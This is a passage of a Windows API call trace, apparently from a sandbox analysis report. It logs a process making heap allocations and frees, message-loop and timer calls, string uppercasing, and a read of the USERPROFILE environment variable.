lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3f58 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73258 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73728 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7918 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0205.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75380 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0205.530] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0205.531] TranslateMessage (lpMsg=0x8cf968) returned 0 [0205.531] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0205.531] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0205.531] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0205.531] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0205.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0205.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0205.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0205.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0205.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0205.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0205.535] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0205.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0205.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0205.536] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0205.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0205.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c:", cchCount1=2, lpString2="c:", cchCount2=2) returned 2 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0205.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0205.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0205.537] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0205.537] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0205.537] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0205.537] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0205.537] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0205.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0205.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0205.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0205.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0205.538] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa270 [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0205.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3c0 [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0205.538] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf2b8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0205.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0205.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0205.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b20 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0205.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0205.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4b0 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0205.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0205.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0205.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0205.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0205.541] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0205.541] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0205.541] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0205.541] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0205.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0205.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 